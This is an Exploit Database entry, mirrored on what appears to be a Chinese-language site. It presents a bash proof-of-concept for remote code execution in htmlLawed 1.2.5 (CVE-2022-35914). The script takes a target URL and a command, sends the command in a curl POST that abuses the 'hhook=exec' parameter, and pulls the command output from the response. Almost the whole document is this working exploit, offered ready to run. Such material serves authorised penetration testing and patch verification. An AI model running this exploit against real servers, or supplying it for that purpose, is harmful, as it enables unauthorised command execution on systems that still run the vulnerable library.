htmlLawed 1.2.5 – Remote Code Execution (RCE)

• Exploit Database
• 11 阅读

• 作者： Miguel Redondo
  日期： 2024-05-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/52023/

• # Exploit Title: htmlLawed 1.2.5 - Remote Code Execution (RCE)
  # Date: 2024-04-24
  # Exploit Author: Miguel Redondo (aka d4t4s3c)
  # Vendor Homepage: https://www.bioinformatics.org/phplabware/internal_utilities/htmLawed
  # Software Link: https://github.com/kesar/HTMLawed
  # Version: <= 1.2.5
  # Tested on: Linux
  # CVE: CVE-2022-35914
  
  banner(){
  echo "______ _______ ____ ___ _____________________ __"
  echo " / ___\ \ / / ____| |___ \ / _ \___ \|___ \|___ / ___|/ _ \/ | || |"
  echo "| |\ \ / /|_| _____ __) | | | |__) | __) |____ |_ \___ \ (_) | | || |_"
  echo "| |___\ V / | |__|_____/ __/| |_| / __/ / __/_____|__) |__) \__, | |__ _|"
  echo " \____|\_/|_____| |_____|\___/_____|_____| |____/____//_/|_||_|"
  }
  
  while getopts ":u:c:" arg; do
  case $arg in
  u) URL=$OPTARG; let parameter_counter+=1 ;;
  c) CMD=$OPTARG; let parameter_counter+=1 ;;
  esac
  done
  
  
  if [ -z "$URL" ] || [ -z "$CMD" ]; then
  banner
  echo -e "\n[i] Usage: ${0} -u <URL> -c <CMD>\n"
  exit
  else
  banner
  echo -e "\n[+] Command output:"
  fi
  
  curl -s -d "sid=foo&hhook=exec&text=${CMD}" -b "sid=foo" ${URL} | egrep '\&nbsp; \[[0-9]+\] =\>'| sed -E 's/\&nbsp; \[[0-9]+\] =\> (.*)<br \/>/\1/'